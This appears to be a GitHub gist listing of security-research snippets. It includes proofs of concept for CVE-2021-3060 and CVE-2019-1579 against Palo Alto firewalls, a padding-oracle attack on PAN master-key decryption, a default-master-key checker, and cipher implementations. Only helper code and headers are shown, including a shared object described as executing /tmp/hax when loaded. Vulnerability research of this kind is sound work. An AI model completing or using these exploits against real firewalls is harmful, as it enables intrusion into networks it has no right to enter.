
rqu1 / badlib.xx
Created September 25, 2022 06:43
.xx-formatted dissection of a tiny ELF I made for CVE-2021-3060
║ badlib.xx -- a tiny ELF shared object by rqu ║
║ This will exec() /tmp/hax when dlopen()'d or loaded ║
║ Originally released in binary form for my CVE-2021-3060 POC: ║
║ ║
║ build the binary with ║
│ Data │ ELF header │ PHDR │ Code │ Dynamic │
rqu1 /
Last active February 15, 2024 19:00
0day padding oracle in PAN master key decryption
import paramiko
import sys
import requests
# String helpers working on 16-character blocks. Each character is handled
# through chr()/ord(), i.e. one character stands for one byte value.
# NOTE(review): this is the Python 2 `str` convention; confirm the interpreter
# before feeding these helpers `bytes` objects.


def pad(n):
    """Return n+1 NUL characters followed by 15-n copies of chr(16-n).

    For n in 0..15 the result is exactly 16 characters long.
    """
    fill = 16 - n
    return '\0' * (n + 1) + chr(fill) * (fill - 1)


def block_xor(x, y):
    """XOR two strings character by character.

    zip() stops at the shorter argument, so the result has that length.
    """
    out = []
    for a, b in zip(x, y):
        out.append(chr(ord(a) ^ ord(b)))
    return ''.join(out)


def byte_xor(x, y, z):
    """Return a copy of string x whose character at index y is XORed with int z."""
    flipped = chr(ord(x[y]) ^ z)
    return x[:y] + flipped + x[y + 1:]


def set_pad(x, n):
    """Return x XORed with the mask produced by pad(n)."""
    return block_xor(pad(n), x)
def formatData(d):
rqu1 /
Last active August 4, 2024 16:42
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
class PanCrypt():
rqu1 /
Last active January 11, 2023 23:52
AES-128 in Brainfuck
rqu1 /
Created March 22, 2020 20:49
dst80 python implementation
def bit(x, n):
    """Return bit *n* of the integer *x* (bit 0 is the least significant)."""
    shifted = x >> n
    return shifted & 1
def bit_slice(x, msb, lsb):
    """Return bits msb..lsb (both inclusive) of *x*, shifted down to bit 0."""
    # (2 << msb) - 1 keeps bits 0..msb and clears everything above.
    mask = (2 << msb) - 1
    kept = x & mask
    return kept >> lsb
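def bv2i(*args):
    """Pack the given bits into one integer, first argument most significant.

    Each argument is OR-ed into the low end of the accumulator after a left
    shift by one, so ``bv2i(1, 0, 1)`` yields ``0b101``. With no arguments
    the result is 0.
    """
    # The accumulator has to exist before the first shift; without this
    # initialisation the loop reads an unbound local.
    o = 0
    for i in args:
        o = (o << 1) | i
    return o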
def fa(x):
    """Return bit *x* of the constant 0x3a35acc5.

    NOTE(review): the constant is presumably the truth table of one of the
    cipher's boolean functions, indexed by the packed input bits; confirm
    against the DST80 description.
    """
    table = 0x3a35acc5
    return bit(table, x)
rqu1 / 8.0 hax
Last active August 4, 2022 12:22
CVE-2019-1579 fun times
#!/usr/bin/env python2
import urllib2
import struct
# Constants
ip_addr= ''
# 8.0